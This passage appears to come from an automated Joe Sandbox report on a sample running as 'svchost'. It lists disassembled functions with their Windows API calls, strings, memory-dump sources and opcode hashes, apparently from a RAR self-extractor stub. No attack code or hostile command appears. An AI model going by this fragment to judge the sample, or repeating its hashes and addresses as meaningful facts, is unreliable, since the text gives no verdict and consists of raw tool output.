                                                            • Instruction Fuzzy Hash: B641B531108318EFCB316F64DC49B6B7BA8FF48705F04455AF849DA166DB34DA08CB62
                                                            Function 00849955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                            • API String ID: 176396367-3743748572
                                                            • Opcode ID: 9739dd84df03d1942c69221b0ec02042cbc23338adc698d038f077108efedffe
                                                            • Instruction ID: 1bef273dcd3931d409fbbf454058bcfdbcabae0d5b3d9130eabc6fe56ff206ea
                                                            • Opcode Fuzzy Hash: 9739dd84df03d1942c69221b0ec02042cbc23338adc698d038f077108efedffe
                                                            • Instruction Fuzzy Hash: B13129226443595ADA30EF949C42B7B73E4FB90760F50841FF8D6D72C0FB64AD9983A2
                                                            Function 0085C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0085C868: _free.LIBCMT ref: 0085C891
                                                            • _free.LIBCMT ref: 0085C8F2
                                                              • Part of subcall function 00858DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0085C896,00863A34,00000000,00863A34,00000000,?,0085C8BD,00863A34,00000007,00863A34,?,0085CCBA,00863A34), ref: 00858DE2
                                                              • Part of subcall function 00858DCC: GetLastError.KERNEL32(00863A34,?,0085C896,00863A34,00000000,00863A34,00000000,?,0085C8BD,00863A34,00000007,00863A34,?,0085CCBA,00863A34,00863A34), ref: 00858DF4
                                                            • _free.LIBCMT ref: 0085C8FD
                                                            • _free.LIBCMT ref: 0085C908
                                                            • _free.LIBCMT ref: 0085C95C
                                                            • _free.LIBCMT ref: 0085C967
                                                            • _free.LIBCMT ref: 0085C972
                                                            • _free.LIBCMT ref: 0085C97D
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                            • Instruction ID: f4aea3e4f543d78a94119c9566ffffc011f195ea41d62b36790ec109805ea864
                                                            • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                            • Instruction Fuzzy Hash: EF110071580708EAE520B775CC07FCB7BECFF14B02F804C25BAADE6092DA65A5498B52
                                                            Function 0084E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0084E669,0084E5CC,0084E86D), ref: 0084E605
                                                            • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0084E61B
                                                            • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0084E630
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                            • API String ID: 667068680-1718035505
                                                            • Opcode ID: 1603a2884e175f93dbc657a9e8e0dd3f6f6fd2445c02529dca5ebc5c7390d421
                                                            • Instruction ID: 4fe7712db5855c93ed6d1d0f19e78f38f6b65af3388894479654879c1c3bd3f1
                                                            • Opcode Fuzzy Hash: 1603a2884e175f93dbc657a9e8e0dd3f6f6fd2445c02529dca5ebc5c7390d421
                                                            • Instruction Fuzzy Hash: 25F0F03178466E9B4F315FB46C8CA66A2C9FB35749F07053EE902D3240EB64CC58DB91
                                                            Function 0084146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 008414C2
                                                              • Part of subcall function 0083B146: GetVersionExW.KERNEL32(?), ref: 0083B16B
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008414E6
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00841500
                                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00841513
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00841523
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00841533
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
                                                            • Opcode ID: c5c42cb2fb0133f19b2256336b806546607eca1cbcd9e2dcec7517e996d623b4
                                                            • Instruction ID: c276adda4be48dd3d38a694f841d746a05c07770536fd4523089c35766b87222
                                                            • Opcode Fuzzy Hash: c5c42cb2fb0133f19b2256336b806546607eca1cbcd9e2dcec7517e996d623b4
                                                            • Instruction Fuzzy Hash: 4831E875118349ABC704DFA8C88499BB7F8FF98714F015A1EF999C3210E770D549CBA6
                                                            Function 00852AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00852AF1,008502FC,0084FA34), ref: 00852B08
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00852B16
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00852B2F
                                                            • SetLastError.KERNEL32(00000000,00852AF1,008502FC,0084FA34), ref: 00852B81
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            • Opcode ID: f838c3a4307665f342b6836698312cde96857536b467cd54e4487c1f64814c3c
                                                            • Instruction ID: e1363d80f12fffaca279622272713bb2ecc0ddd0c7cb2941e6a67a819ca196c8
                                                            • Opcode Fuzzy Hash: f838c3a4307665f342b6836698312cde96857536b467cd54e4487c1f64814c3c
                                                            • Instruction Fuzzy Hash: 1601F736108711AEAA152F787C859262FA9FF127B7B61173AFD10D50E0FF915C0C9246
                                                            Function 008597E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,00871030,00854674,00871030,?,?,00853F73,00000050,?,00871030,00000200), ref: 008597E9
                                                            • _free.LIBCMT ref: 0085981C
                                                            • _free.LIBCMT ref: 00859844
                                                            • SetLastError.KERNEL32(00000000,?,00871030,00000200), ref: 00859851
                                                            • SetLastError.KERNEL32(00000000,?,00871030,00000200), ref: 0085985D
                                                            • _abort.LIBCMT ref: 00859863
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free$_abort
                                                            • String ID:
                                                            • API String ID: 3160817290-0
                                                            • Opcode ID: 2875021a1cfa2ec65dba1d9957098ae35cbc3059c2fb7d1e18cb8ca2db47c9d8
                                                            • Instruction ID: 8844b07cfbafff51f7d2323b7607ce6118491037b4e336ce155a82feac8fc531
                                                            • Opcode Fuzzy Hash: 2875021a1cfa2ec65dba1d9957098ae35cbc3059c2fb7d1e18cb8ca2db47c9d8
                                                            • Instruction Fuzzy Hash: A0F0C835144A05F6CA1233387C4AA2B2AA5FFE2773F250134FD58E6292FF60C80D4567
                                                            Function 0084DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0084DC47
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0084DC61
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0084DC72
                                                            • TranslateMessage.USER32(?), ref: 0084DC7C
                                                            • DispatchMessageW.USER32(?), ref: 0084DC86
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0084DC91
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 2148572870-0
                                                            • Opcode ID: b5ba7617ce995e266aa63a06dca51fae9ee38991651921f3c818c459d5c051d1
                                                            • Instruction ID: 3c2e76b298890f5847d9fe9905b992c4c4d00988d9e14998d2baf4fc19d157ce
                                                            • Opcode Fuzzy Hash: b5ba7617ce995e266aa63a06dca51fae9ee38991651921f3c818c459d5c051d1
                                                            • Instruction Fuzzy Hash: 69F04F72A01219BBCB206BA5EC4DDCF7F7DFF42791B044012F50AD2060D674C64ACBA1
                                                            Function 0083C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008405DA: _wcslen.LIBCMT ref: 008405E0
                                                              • Part of subcall function 0083B92D: _wcsrchr.LIBVCRUNTIME ref: 0083B944
                                                            • _wcslen.LIBCMT ref: 0083C197
                                                            • _wcslen.LIBCMT ref: 0083C1DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_wcsrchr
                                                            • String ID: .exe$.rar$.sfx
                                                            • API String ID: 3513545583-31770016
                                                            • Opcode ID: dcbc389547e6513ccdb73347fd943969dc55f3f9c2c80a9238dde732a7300a95
                                                            • Instruction ID: 184ee7e7893289fe16bb298e69024179e6f2d3c3e6def1c41894d0f9da5d1f4d
                                                            • Opcode Fuzzy Hash: dcbc389547e6513ccdb73347fd943969dc55f3f9c2c80a9238dde732a7300a95
                                                            • Instruction Fuzzy Hash: BB41482650075995C736AF788852A7FB7A8FFC1744F10090EF9A2FB182EB644D81D3D6
                                                            Function 0084CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000800,?), ref: 0084CE9D
                                                              • Part of subcall function 0083B690: _wcslen.LIBCMT ref: 0083B696
                                                            • _swprintf.LIBCMT ref: 0084CED1
                                                              • Part of subcall function 00834092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008340A5
                                                            • SetDlgItemTextW.USER32(?,00000066,0087946A), ref: 0084CEF1
                                                            • EndDialog.USER32(?,00000001), ref: 0084CFFE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: %s%s%u
                                                            • API String ID: 110358324-1360425832
                                                            • Opcode ID: 1dd8125d7ebf64e62c23152a2b13c5f7d99d387cce35906ae829c3355da48631
                                                            • Instruction ID: 90128df52e63059e18bbfef54399f4a7c2051ab64d70c8b89b471e4fca006e59
                                                            • Opcode Fuzzy Hash: 1dd8125d7ebf64e62c23152a2b13c5f7d99d387cce35906ae829c3355da48631
                                                            • Instruction Fuzzy Hash: 844190B190061CAADF25DB54CC45EEE77BCFB05304F4080A6FA09E7151EEB49A84CF62
                                                            Function 0083BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 0083BB27
                                                            • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0083A275,?,?,00000800,?,0083A23A,?,0083755C), ref: 0083BBC5
                                                            • _wcslen.LIBCMT ref: 0083BC3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CurrentDirectory
                                                            • String ID: UNC$\\?\
                                                            • API String ID: 3341907918-253988292
                                                            • Opcode ID: e0007b6ba827845808d06b87df578f85d2b43b3fbd86ca90be6358d38af90c45
                                                            • Instruction ID: 19aa7aff296aa19d6fe3410b621f860aed601c9ee2702ce33161b6013f92445f
                                                            • Opcode Fuzzy Hash: e0007b6ba827845808d06b87df578f85d2b43b3fbd86ca90be6358d38af90c45
                                                            • Instruction Fuzzy Hash: 0C41BFB1400219A6CB31AF64CC42EEB77A8FFC1394F108425FA54E3151EB78DE918AE1
                                                            Function 0084B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadBitmapW.USER32(00000065), ref: 0084B6ED
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0084B712
                                                            • DeleteObject.GDI32(00000000), ref: 0084B744
                                                            • DeleteObject.GDI32(00000000), ref: 0084B767
                                                              • Part of subcall function 0084A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0084B73D,00000066), ref: 0084A6D5
                                                              • Part of subcall function 0084A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0084B73D,00000066), ref: 0084A6EC
                                                              • Part of subcall function 0084A6C2: LoadResource.KERNEL32(00000000,?,?,?,0084B73D,00000066), ref: 0084A703
                                                              • Part of subcall function 0084A6C2: LockResource.KERNEL32(00000000,?,?,?,0084B73D,00000066), ref: 0084A712
                                                              • Part of subcall function 0084A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0084B73D,00000066), ref: 0084A72D
                                                              • Part of subcall function 0084A6C2: GlobalLock.KERNEL32(00000000), ref: 0084A73E
                                                              • Part of subcall function 0084A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0084A762
                                                              • Part of subcall function 0084A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0084A7A7
                                                              • Part of subcall function 0084A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0084A7C6
                                                              • Part of subcall function 0084A6C2: GlobalFree.KERNEL32(00000000), ref: 0084A7CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                            • String ID: ]
                                                            • API String ID: 1797374341-3352871620
                                                            • Opcode ID: ca2f0a07a358517ec8d05307b8b33a6350af84482ef2114484033c60644d4933
                                                            • Instruction ID: 0780b7174a9d2a4445d6bf25d7f39490b4784bf4165296ea38768b4d36eb999a
                                                            • Opcode Fuzzy Hash: ca2f0a07a358517ec8d05307b8b33a6350af84482ef2114484033c60644d4933
                                                            • Instruction Fuzzy Hash: 4F01F53658060D67C71277B89C4AA7F7ABAFFC0B62F0A0011F900EB295EF31CD0542A2
                                                            Function 0084D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00831316: GetDlgItem.USER32(00000000,00003021), ref: 0083135A
                                                              • Part of subcall function 00831316: SetWindowTextW.USER32(00000000,008635F4), ref: 00831370
                                                            • EndDialog.USER32(?,00000001), ref: 0084D64B
                                                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0084D661
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 0084D675
                                                            • SetDlgItemTextW.USER32(?,00000068), ref: 0084D684
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: RENAMEDLG
                                                            • API String ID: 445417207-3299779563
                                                            • Opcode ID: eeb26298ae4cdd202632618ac77363dd3d03ef06a2c587636b4dc7c834c2b581
                                                            • Instruction ID: 4a8e74d4520bfe724d8f66e71f76c3a689eb780a074987ef49f078ff1484f8ab
                                                            • Opcode Fuzzy Hash: eeb26298ae4cdd202632618ac77363dd3d03ef06a2c587636b4dc7c834c2b581
                                                            • Instruction Fuzzy Hash: 6C014C3328531CBBD6105F689D09F57776DFBAAB01F020411F305E20D1C7A29A148BB9
                                                            Function 00857E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00857E24,00000000,?,00857DC4,00000000,0086C300,0000000C,00857F1B,00000000,00000002), ref: 00857E93
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00857EA6
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00857E24,00000000,?,00857DC4,00000000,0086C300,0000000C,00857F1B,00000000,00000002), ref: 00857EC9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 7040037cd27d0cc9384cd0cbeade0a04db1807798e82297bab3aae1edff93fbe
                                                            • Instruction ID: 77bc76ce71ff68cf08a51423ebac7060492ddedb3eb0a40cb3e33fa41596b36b
                                                            • Opcode Fuzzy Hash: 7040037cd27d0cc9384cd0cbeade0a04db1807798e82297bab3aae1edff93fbe
                                                            • Instruction Fuzzy Hash: F2F06831904208BBCB119FA4DC09B9EBFB9FF44712F0181A9FD05E6250DB749E54CB95
                                                            Function 0083F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0084081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00840836
                                                              • Part of subcall function 0084081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0083F2D8,Crypt32.dll,00000000,0083F35C,?,?,0083F33E,?,?,?), ref: 00840858
                                                            • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0083F2E4
                                                            • GetProcAddress.KERNEL32(008781C8,CryptUnprotectMemory), ref: 0083F2F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
